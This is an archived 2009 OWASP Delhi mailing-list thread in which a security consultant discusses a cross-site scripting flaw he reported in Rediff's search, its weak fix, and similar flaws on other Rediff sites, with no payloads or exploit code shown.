[Owasp-delhi] Rediff Vulnerability

SISA Abhay Bhargav ab at sisa.co.in
Wed May 27 12:01:50 EDT 2009

Right Surendra

I hadn't tested with the escape() encoding. Looks like the folks at Rediff
are just doing some poor filtering like the unencoded "<>"s. Looks like I
praised them too soon. L

Anyway, this is just one of them. XSS issues are all over the Rediff sites.

Regards

Abhay Bhargav

CISSP, CPA, CISA, PCI QSA, OCTAVE Implementer

 <http://www.sisa.co.in/> cid:image002.jpg at 01C97D81.CC02AB70

SISA Information Security (P) Ltd| Ph 91 80 41153769| Fx 91 80 41153796

Sent by: owasp-delhi-bounces at lists.owasp.org

05/27/2009 07:57 PM

Please respond to
abhay.bhargav at sisa.co.in

<owasp-delhi at lists.owasp.org>

cc

Subject

[Owasp-delhi] Rediff Vulnerability

Hi All

I am pleased to see that the Rediff Search XSS issue has been fixed.
Although I reported the issue to Rediff, I would like to thank some members
of OWASP Delhi for having taken the matter to a higher plane and reporting
it to someone who has been proactive.

Unfortunately, several other Rediff sites are as vulnerable to XSS as ever.
I will probably go ahead and report this issue as well. Hopefully it gets
sorted out as quickly as the previous one.

Check it out:  <http://citadelnotes.blogspot.com/>
http://citadelnotes.blogspot.com

Regards
Abhay Bhargav
CISSP, CPA, CISA, PCI QSA, OCTAVE Implementer
 <http://www.sisa.co.in/> cid:image002.jpg at 01C97D81.CC02AB70
SISA Information Security (P) Ltd| Ph 91 80 41153769| Fx 91 80 41153796

privileged. If you have received it by mistake please notify the sender by
return e-mail and delete this message from your system. Any unauthorised use
or dissemination of this message in whole or in part is strictly prohibited.
Please note that e-mails are susceptible to change. ABN AMRO Central
Enterprise Services Pvt Ltd, part of RBS Group plc , having its registered
office at Empire Complex, 414 Senapati Bapat Marg, Lower Parel (W), Mumbai -
400 013 , including its group companies, shall not be liable for the
improper or incomplete transmission of the information contained in this
communication nor for any delay in its receipt or damage to your system. ABN
AMRO Central Enterprise Services Pvt Ltd (or its group companies) does not
guarantee that the integrity of this communication has been maintained nor
that this communication is free of viruses, interceptions or interference.